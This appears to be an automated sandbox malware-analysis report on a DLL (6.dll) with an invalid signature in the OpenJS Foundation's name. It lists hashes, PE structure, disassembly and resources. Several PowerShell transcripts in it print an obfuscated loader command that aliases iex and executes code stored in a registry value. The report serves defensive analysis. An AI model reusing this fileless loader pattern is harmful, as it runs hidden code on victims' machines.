                          SHA1:B89C1EC666680DA7AB129A0F5E9A593625D94201
                          SHA-256:0CF920EAE8AD9733EB1FEAE76CAE748499E334BD5AF3B8E6F0D1940810C3D7F2
                          SHA-512:87CA675464DED2449A4BC6AD61202FA04F00D1AF173D1BF3E471CC5413A85C204EA967C27177FC37A4E80B7E5E31258FA41C0081FF35638F42CC28429D3AC532
                          Malicious:false
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                          C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.out
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                          Category:modified
                          Size (bytes):868
                          Entropy (8bit):5.348694375232745
                          Encrypted:false
                          SSDEEP:12:xKIR37Lvkmb6KzMWZE2sKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6Kz9E2sKaM5DqBVKVrdFAMBJTH
                          MD5:D86ACBAA58E203B2849D410C07220578
                          SHA1:22F3A10EF4FB73B6A76D6FA4C6DCC7D8E6842A83
                          SHA-256:9FEC93CFFFF08573DED5958B966582FAC2EB57E68469BF94850C73385625AB86
                          SHA-512:4C56050C5B07C3C13FEFCF808D5E9B28BDC724255406C6A01167949E7E036623E544F32E2B6C16526B4A02BFB52F3DD887F5F362AB856BB5679834C87A68524B
                          Malicious:false
                          Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                          C:\Users\user\Documents\20211214\PowerShell_transcript.841675.6dNuCqGT.20211214103418.txt
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1359
                          Entropy (8bit):5.406002359282101
                          Encrypted:false
                          SSDEEP:24:BxSAPzDvBB/x2DOXUWnpLCHm4XWUHjeTKKjX4CIym1ZJXXB/pLCHm4StnxSAZ7t:BZP/v//oOHKm4GUqDYB1Z9B/Km4SRZZR
                          MD5:51B9F4D065CD36EEB47C62B81AFB7F06
                          SHA1:BCFD8E1BD2F58F4F3F3150F672857CF45E23BC2A
                          SHA-256:FAF75023385D35770B9D01F760C1876E1E25445A6D9C839CDAE71091453519F8
                          SHA-512:2BC504F6988648C5FA1DEF96CA3B22A0CC01AD926334F4FB0271D0FA324304F00CF6FBEE76A575C72EFF27D6C4C45BC19DB97E463E175CC38B6793219BD020E6
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103419..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 7012..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103419..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq
                          C:\Users\user\Documents\20211214\PowerShell_transcript.841675.DMr5Wv1u.20211214103418.txt
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1359
                          Entropy (8bit):5.403706904252732
                          Encrypted:false
                          SSDEEP:24:BxSAPzDvBB/x2DOXUWnpLCHm4XWiHjeTKKjX4CIym1ZJXXJpLCHm4StOnxSAZ7iq:BZP/v//oOHKm4GiqDYB1Z9JKm4SaZZ7d
                          MD5:7291ABA011A1193C203450F5D3512461
                          SHA1:310F781764BB9AC8A8D3B7F14E38AD05EE18730C
                          SHA-256:0FA2BD16F02EEC7CA811D01D14782EC171D0A7E6AC1C4439C87B2E6A0C6536C4
                          SHA-512:C2BAB621C1E45A10BEC063ED6F84F63BD94D8533B83FC22A552BA35791A25B0254CF95F3341DC46CE4C6ED63D9698E2114A4A17D3F25BC38B6305B5A257955D9
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103420..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 7160..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103420..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq
                          C:\Users\user\Documents\20211214\PowerShell_transcript.841675.ZSxBE1Sk.20211214103425.txt
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1146
                          Entropy (8bit):5.544628786712
                          Encrypted:false
                          SSDEEP:24:BxSAPJDvBB/x2DOXUWnpLCHm4XW/HjeTKKjX4CIym1ZJXX7pLCHm4v:BZPhv//oOHKm4G/qDYB1Z97Km4v
                          MD5:E0C308808C66AB01D5B3EF7C3856B1D5
                          SHA1:13F36AB3AAEA583989B9C72E15A29F8F49EC8B2A
                          SHA-256:EA41567677F8A22C46060C26ACB8AE2B68B789283782A6096F264A4DBF25468D
                          SHA-512:3EF71D741446DA480EEA5ECDDF428571059A11C2516C8287FA5A891426E1014D9C41649F5D1912D748379F93468DD1C7EB8A9AC14CCD3FFEFBF292E3C707EE4E
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103426..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 3532..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103426..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq
                          C:\Users\user\Documents\20211214\PowerShell_transcript.841675.g3ZPtttJ.20211214103418.txt
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1146
                          Entropy (8bit):5.542879881063877
                          Encrypted:false
                          SSDEEP:24:BxSAPzDvBB/x2DOXUWnpLCHm4XWnHjeTKKjX4CIym1ZJXXB/pLCHm4v:BZP/v//oOHKm4GnqDYB1Z9B/Km4v
                          MD5:635442A47792E7CA6AB6C67E60181544
                          SHA1:1476DE8E879BA1B92742F3F951AECE56DE2A882A
                          SHA-256:C9026B19F44A3E5A20EA9A2F355703C5BC988246CC98D0EE2228333766324050
                          SHA-512:6621F0DB6601D61F5736EB95425F4590ADB546FA422ACC627F4A26544387BA9F274D9A5B13E54DA30228EEBD8EB4DE76CE125A435080D46A6FC5A502FAF2646F
                          Malicious:false
                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20211214103419..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 841675 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UtilDiagram))..Process ID: 7132..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211214103419..**********************..PS>new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq

                          Static File Info

                          General

                          File type:MS-DOS executable, MZ for MS-DOS
                          Entropy (8bit):5.270863171013114
                          TrID:
                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                          • Generic Win/DOS Executable (2004/3) 0.20%
                          • DOS Executable Generic (2002/1) 0.20%
                          • VXD Driver (31/22) 0.00%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:6.dll
                          File size:1781920
                          MD5:ac57d694b86d8532b38d3d62f6de3afc
                          SHA1:c858ec742ba91bf8c139b7bb654ca2d67747c5ef
                          SHA256:fa668d1a58b3b92d9c1b9a740facfaebb35dd723deaf5a3833592208a8a47e5e
                          SHA512:cd9635d667a43c0d6715ec05c114c424b3f1292d7997c8d6c86f937ff81a08262763d33621c7d75d3c2a5fac75b58c71489fe3360fd4a2d6c804e7a72a06683b
                          SSDEEP:49152:JOMo8UQw8MT8UQw8MT8UQw8MT8UQw8MT8UQw8MT8UQw8Mc:xo8UQw8MT8UQw8MT8UQw8MT8UQw8MT8Z
                          File Content Preview:MZ......................................................................!..L.!This .ro.ra. cannot be run in DOS m.de....$.......PE..L...[..a...........!....................................................................................................V..

                          File Icon

                          Icon Hash:82b0f4c6d2c66cb1

                          Static PE Info

                          General

                          Entrypoint:0x1001f3fe
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x10000000
                          Subsystem:windows gui
                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                          DLL Characteristics:
                          Time Stamp:0x61B6D25B [Mon Dec 13 04:55:55 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:90a569c76737ac6eae14ae164dabea89

                          Authenticode Signature

                          Signature Valid:false
                          Signature Issuer:CN=DigiCert SHA2 Assured ID Code Signing CA, OU=www.digicert.com, O=DigiCert Inc, C=US
                          Signature Validation Error:The digital signature of the object did not verify
                          Error Number:-2146869232
                          Not Before, Not After
                          • 10/1/2020 5:00:00 PM 12/18/2023 4:00:00 AM
                          Subject Chain
                          • CN=OpenJS Foundation, O=OpenJS Foundation, L=San Francisco, S=California, C=US
                          Version:3
                          Thumbprint MD5:8E8056A2284F0304445ED325353454BF
                          Thumbprint SHA-1:E16BB6EE4ED3935C46C356D147E811286BA4BBFE
                          Thumbprint SHA-256:968F9536C18A4475095B37792855AA62306275DEC05BD72F21653C98026CFC4E
                          Serial:038EDB2FC6E405731A760F1516144C85

                          Entrypoint Preview

                          Instruction
                          mov ebx, edi
                          or ebx, edi
                          jmp 00007FD68CC158E2h
                          ret
                          ret
                          pop ecx
                          push esi
                          pop ebx
                          ret
                          mov edi, dword ptr [1000335Ch]
                          call 00007FD68CC147C8h
                          mov esp, dword ptr [ebp-18h]
                          mov word ptr [100030FCh], es
                          mov ecx, dword ptr [ebp-04h]
                          lea ebp, dword ptr [esp+10h]
                          int3
                          int3
                          push ebp
                          push edi
                          mov dword ptr [10003120h], eax
                          push eax
                          je 00007FD68CC144B6h
                          int3
                          mov dword ptr fs:[00000000h], ecx
                          mov eax, dword ptr [ebp+0Ch]
                          mov ecx, edi
                          push eax
                          jmp dword ptr [100040BCh]
                          add ecx, eax
                          mov eax, dword ptr [ecx]
                          cmp edi, ecx
                          mov eax, dword ptr [ecx]
                          push 10000000h
                          mov eax, dword ptr [ebp-14h]
                          push 00000000h
                          push 1001E268h
                          ret
                          xor esi, esi
                          xor esi, esi
                          xor esi, esi
                          pop eax
                          int3
                          int3
                          int3
                          mov esp, dword ptr [ebp-18h]
                          int3
                          jmp dword ptr [10004078h]
                          pop ebx
                          sete cl
                          call 00007FD68CC14373h
                          int3
                          mov ecx, edi
                          ret
                          jmp dword ptr [1000406Ch]
                          ret
                          call 00007FD68CC1407Ch
                          int3
                          int3
                          mov word ptr [100030F8h], fs
                          cmp dword ptr [10003010h], 00000000h
                          int3
                          int3
                          int3
                          call 00007FD68CC1453Fh
                          int3
                          int3
                          mov ebp, esp
                          push dword ptr [ebp+08h]
                          int3
                          sub al, cl
                          jmp 00007FD68CC170D8h
                          int3
                          int3
                          int3
                          push eax
                          mov dword ptr [ebp-04h], eax
                          int3
                          cmp dword ptr [00000000h], 00000000h

                          Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1cff0 | 0x56 | .text
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x43d04 | 0xb4 | .data
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x47000 | 0x16f8e8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1b1800 | 0x18a0 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1b7000 | 0x6ec | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x28d06 | 0x27c | .data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                          Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x26ec0 | 0x24800 | False | 0.516815603596 | data | 5.50396706074 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x28000 | 0x1e4fe | 0x1be00 | False | 0.057858043722 | data | 6.06796420192 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc | 0x47000 | 0x16f8e8 | 0x16fa00 | False | 0.218529518021 | data | 4.81717219526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1b7000 | 0x6ec | 0x800 | False | 0.75 | data | 6.07315256741 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x4af70 | 0x668 | data | English | United States
RT_ICON | 0x4b5d8 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON | 0x4b8c0 | 0x1e8 | data | English | United States
RT_ICON | 0x4baa8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x4bbd0 | 0xea8 | data | English | United States
RT_ICON | 0x4ca78 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x4d320 | 0x6c8 | data | English | United States
RT_ICON | 0x4d9e8 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x4df50 | 0x25a8 | data | English | United States
RT_ICON | 0x504f8 | 0x10a8 | data | English | United States
RT_ICON | 0x515a0 | 0x988 | data | English | United States
RT_ICON | 0x51f28 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x52390 | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
RT_ICON | 0x647b8 | 0x4c28 | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
RT_ICON | 0x693e0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
RT_ICON | 0x6d608 | 0x25a8 | data | English | United States
RT_ICON | 0x6fbb0 | 0x10a8 | data | English | United States
RT_ICON | 0x70c58 | 0xeb0 | data | English | United States
RT_ICON | 0x71b08 | 0x988 | data | English | United States
RT_ICON | 0x72490 | 0x6b8 | data | English | United States
RT_ICON | 0x72b48 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x72fb0 | 0x668 | data | English | United States
RT_ICON | 0x73618 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON | 0x73900 | 0x1e8 | data | English | United States
RT_ICON | 0x73ae8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x73c10 | 0xea8 | data | English | United States
RT_ICON | 0x74ab8 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x75360 | 0x6c8 | data | English | United States
RT_ICON | 0x75a28 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x75f90 | 0x25a8 | data | English | United States
RT_ICON | 0x78538 | 0x10a8 | data | English | United States
RT_ICON | 0x795e0 | 0x988 | data | English | United States
RT_ICON | 0x79f68 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x7a3d0 | 0x668 | data | English | United States
RT_ICON | 0x7aa38 | 0x2e8 | data | English | United States
RT_ICON | 0x7ad20 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x7ae48 | 0xea8 | data | English | United States
RT_ICON | 0x7bcf0 | 0x8a8 | data | English | United States
RT_ICON | 0x7c598 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x7cb00 | 0x452e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x81030 | 0x25a8 | data | English | United States
RT_ICON | 0x835d8 | 0x10a8 | data | English | United States
RT_ICON | 0x84680 | 0x988 | data | English | United States
RT_ICON | 0x85008 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x85470 | 0x668 | data | English | United States
RT_ICON | 0x85ad8 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON | 0x85dc0 | 0x1e8 | data | English | United States
RT_ICON | 0x85fa8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x860d0 | 0xea8 | data | English | United States
RT_ICON | 0x86f78 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0x87820 | 0x6c8 | data | English | United States
RT_ICON | 0x87ee8 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x88450 | 0x25a8 | data | English | United States
RT_ICON | 0x8a9f8 | 0x10a8 | data | English | United States
RT_ICON | 0x8baa0 | 0x988 | data | English | United States
RT_ICON | 0x8c428 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x8c890 | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
RT_ICON | 0x9ecb8 | 0x4c28 | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
RT_ICON | 0xa38e0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
RT_ICON | 0xa7b08 | 0x25a8 | data | English | United States
RT_ICON | 0xaa0b0 | 0x10a8 | data | English | United States
RT_ICON | 0xab158 | 0xeb0 | data | English | United States
RT_ICON | 0xac008 | 0x988 | data | English | United States
RT_ICON | 0xac990 | 0x6b8 | data | English | United States
RT_ICON | 0xad048 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xad4b0 | 0x668 | data | English | United States
RT_ICON | 0xadb18 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON | 0xade00 | 0x1e8 | data | English | United States
RT_ICON | 0xadfe8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xae110 | 0xea8 | data | English | United States
RT_ICON | 0xaefb8 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0xaf860 | 0x6c8 | data | English | United States
RT_ICON | 0xaff28 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xb0490 | 0x25a8 | data | English | United States
RT_ICON | 0xb2a38 | 0x10a8 | data | English | United States
RT_ICON | 0xb3ae0 | 0x988 | data | English | United States
RT_ICON | 0xb4468 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xb48d0 | 0x668 | data | English | United States
RT_ICON | 0xb4f38 | 0x2e8 | data | English | United States
RT_ICON | 0xb5220 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xb5348 | 0xea8 | data | English | United States
RT_ICON | 0xb61f0 | 0x8a8 | data | English | United States
RT_ICON | 0xb6a98 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xb7000 | 0x452e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0xbb530 | 0x25a8 | data | English | United States
RT_ICON | 0xbdad8 | 0x10a8 | data | English | United States
RT_ICON | 0xbeb80 | 0x988 | data | English | United States
RT_ICON | 0xbf508 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xbf970 | 0x668 | data | English | United States
RT_ICON | 0xbffd8 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON | 0xc02c0 | 0x1e8 | data | English | United States
RT_ICON | 0xc04a8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xc05d0 | 0xea8 | data | English | United States
RT_ICON | 0xc1478 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0xc1d20 | 0x6c8 | data | English | United States
RT_ICON | 0xc23e8 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xc2950 | 0x25a8 | data | English | United States
RT_ICON | 0xc4ef8 | 0x10a8 | data | English | United States
RT_ICON | 0xc5fa0 | 0x988 | data | English | United States
RT_ICON | 0xc6928 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xc6d90 | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
RT_ICON | 0xd91b8 | 0x4c28 | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
RT_ICON | 0xddde0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
RT_ICON | 0xe2008 | 0x25a8 | data | English | United States
RT_ICON | 0xe45b0 | 0x10a8 | data | English | United States
RT_ICON | 0xe5658 | 0xeb0 | data | English | United States
RT_ICON | 0xe6508 | 0x988 | data | English | United States
RT_ICON | 0xe6e90 | 0x6b8 | data | English | United States
RT_ICON | 0xe7548 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xe79b0 | 0x668 | data | English | United States
RT_ICON | 0xe8018 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON | 0xe8300 | 0x1e8 | data | English | United States
RT_ICON | 0xe84e8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xe8610 | 0xea8 | data | English | United States
RT_ICON | 0xe94b8 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0xe9d60 | 0x6c8 | data | English | United States
RT_ICON | 0xea428 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xea990 | 0x25a8 | data | English | United States
RT_ICON | 0xecf38 | 0x10a8 | data | English | United States
RT_ICON | 0xedfe0 | 0x988 | data | English | United States
RT_ICON | 0xee968 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xeedd0 | 0x668 | data | English | United States
RT_ICON | 0xef438 | 0x2e8 | data | English | United States
RT_ICON | 0xef720 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xef848 | 0xea8 | data | English | United States
RT_ICON | 0xf06f0 | 0x8a8 | data | English | United States
RT_ICON | 0xf0f98 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xf1500 | 0x452e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0xf5a30 | 0x25a8 | data | English | United States
RT_ICON | 0xf7fd8 | 0x10a8 | data | English | United States
RT_ICON | 0xf9080 | 0x988 | data | English | United States
RT_ICON | 0xf9a08 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xf9e70 | 0x668 | data | English | United States
RT_ICON | 0xfa4d8 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 117473463, next used block 30577 | English | United States
RT_ICON | 0xfa7c0 | 0x1e8 | data | English | United States
RT_ICON | 0xfa9a8 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xfaad0 | 0xea8 | data | English | United States
RT_ICON | 0xfb978 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
RT_ICON | 0xfc220 | 0x6c8 | data | English | United States
RT_ICON | 0xfc8e8 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0xfce50 | 0x25a8 | data | English | United States
RT_ICON | 0xff3f8 | 0x10a8 | data | English | United States
RT_ICON | 0x1004a0 | 0x988 | data | English | United States
RT_ICON | 0x100e28 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_ICON | 0x101290 | 0x12428 | dBase IV DBT, blocks size 0, block length 8192, next free block index 40, next free block 1802201963, next used block 1802201963 | English | United States
RT_ICON | 0x1136b8 | 0x4c28 | dBase IV DBT, blocks size 0, block length 18432, next free block index 40, next free block 0, next used block 4278648832 | English | United States
RT_ICON | 0x1182e0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 33357823 | English | United States
RT_ICON | 0x11c508 | 0x25a8 | data | English | United States
RT_ICON | 0x11eab0 | 0x10a8 | data | English | United States
RT_ICON | 0x11fb58 | 0xeb0 | data | English | United States
